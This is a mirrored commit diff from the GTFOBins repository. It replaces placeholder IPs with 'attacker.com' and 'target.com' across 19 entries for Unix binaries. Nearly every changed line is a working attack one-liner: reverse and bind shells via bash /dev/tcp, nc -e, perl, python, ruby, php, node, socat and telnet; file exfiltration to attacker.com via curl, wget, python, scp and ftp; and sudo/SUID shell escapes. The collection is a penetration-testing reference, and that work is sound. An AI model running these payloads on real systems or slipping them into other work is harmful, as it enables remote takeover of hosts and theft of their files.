mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
Code Issues

Use target.com and attacker.com

Browse Source
This commit is contained in:
Emilio Pinna 2018-05-24 20:59:21 +01:00
parent 4bea8d51cc
commit b857c98f92
19 changed files with 58 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
_gtfobins/awk.md
View File

@ -9,14 +9,14 @@ functions:
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- description: Run `nc 10.0.0.1 12345` to connect to the shell on the other end.
- description: Run `nc target.com 12345` to connect to the shell on the other end.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {

10
_gtfobins/bash.md
View File

@ -9,33 +9,33 @@ functions:
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
cat $LFILE > /dev/tcp/$RHOST/$RPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
LFILE=file_to_get
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` to send the file from the other end.
code: |-
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
LFILE=file_to_get
cat < /dev/tcp/$RHOST/$RPORT > $LFILE
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1
---

8
_gtfobins/curl.md
View File

@ -3,13 +3,13 @@ functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
URL=http://10.0.0.1/
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
code: |
URL=http://attacker.com/file_to_get
LFILE=where_to_save
curl $URL -o $LFILE
---

4
_gtfobins/ftp.md
View File

@ -11,13 +11,13 @@ functions:
upload:
- description: Send local file to a FTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
ftp $RHOST
get file_to_get
---

8
_gtfobins/nc.md
View File

@ -4,12 +4,12 @@ functions:
- description: |
Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
- description: Fetch remote file from a remote TCP port. Run `nc 10.0.0.1 12345 < "file_to_send"` to send the file from the other end.
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` to send the file from the other end.
code: |-
LPORT=12345
LFILE=where_to_save
@ -17,11 +17,11 @@ functions:
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell:
- description: Run `nc 10.0.0.1 12345` to connect to the shell on the other end.
- description: Run `nc target.com 12345` to connect to the shell on the other end.
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh

4
_gtfobins/node.md
View File

@ -12,7 +12,7 @@ functions:
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () {
@ -21,7 +21,7 @@ functions:
sh.stderr.pipe(this);
});'
bind-shell:
- description: Run `nc 10.0.0.1 12345` to connect to the shell on the other end.
- description: Run `nc target.com 12345` to connect to the shell on the other end.
code: |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");

2
_gtfobins/perl.md
View File

@ -9,7 +9,7 @@ functions:
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---

6
_gtfobins/php.md
View File

@ -28,13 +28,13 @@ functions:
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=127.0.0.1
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
---

8
_gtfobins/python2.md
View File

@ -9,7 +9,7 @@ functions:
upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
export URL=http://10.0.0.1/
export URL=http://attacker.com/
export LFILE=file_to_send
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
@ -19,13 +19,13 @@ functions:
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
code: |
export RHOST=127.0.0.1
export RHOST=attacker.com
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:

8
_gtfobins/python3.md
View File

@ -9,7 +9,7 @@ functions:
upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
export URL=http://10.0.0.1/
export URL=http://attacker.com/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
@ -19,13 +19,13 @@ functions:
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
code: |
export RHOST=127.0.0.1
export RHOST=attacker.com
export RPORT=12345
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:

2
_gtfobins/ruby.md
View File

@ -12,7 +12,7 @@ functions:
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
load-library:

4
_gtfobins/scp.md
View File

@ -24,13 +24,13 @@ functions:
upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@10.0.0.1:~/where_to_save
RPATH=user@attacker.com:~/where_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@10.0.0.1:~/file_to_get
RPATH=user@attacker.com:~/file_to_get
LFILE=where_to_save
scp $RPATH $LFILE
---

8
_gtfobins/sftp.md
View File

@ -2,24 +2,24 @@
functions:
exec-interactive:
- code: |
HOST=user@10.0.0.1
HOST=user@attacker.com
sftp $HOST
!/bin/sh
sudo-enabled:
- code: |
HOST=user@10.0.0.1
HOST=user@attacker.com
sudo sftp $HOST
!/bin/sh
upload:
- description: Send local file to a SSH server.
code: |
RHOST=user@10.0.0.1
RHOST=user@attacker.com
sftp $RHOST
put file_to_send where_to_save
download:
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@10.0.0.1
RHOST=user@attacker.com
sftp $RHOST
get file_to_get where_to_save
---

4
_gtfobins/socat.md
View File

@ -3,11 +3,11 @@ functions:
reverse-shell:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
bind-shell:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:10.0.0.2:12345</code> to connect to the shell on the other end.
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> to connect to the shell on the other end.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

4
_gtfobins/ssh.md
View File

@ -6,14 +6,14 @@ functions:
download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@10.0.0.1
HOST=user@attacker.com
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
HOST=user@10.0.0.1
HOST=user@attacker.com
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH

2
_gtfobins/tclsh.md
View File

@ -15,7 +15,7 @@ functions:
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
---

20
_gtfobins/telnet.md
View File

@ -1,34 +1,34 @@
---
functions:
exec-interactive:
- description: BSD version only.
- description: BSD version only. Needs to be connected first.
code: |
RHOST=www.google.com
RPORT=80
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled:
- description: BSD version only.
- description: BSD version only. Needs to be connected first.
code: |
RHOST=www.google.com
RPORT=80
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
- description: BSD version only.
- description: BSD version only. Needs to be connected first.
code: |
RHOST=www.google.com
RPORT=80
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh

4
_gtfobins/tftp.md
View File

@ -3,13 +3,13 @@ functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
tftp $RHOST
get file_to_get
---

6
_gtfobins/wget.md
View File

@ -3,13 +3,13 @@ functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
export URL=http://10.0.0.1/
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
wget $URL -O $LFILE
---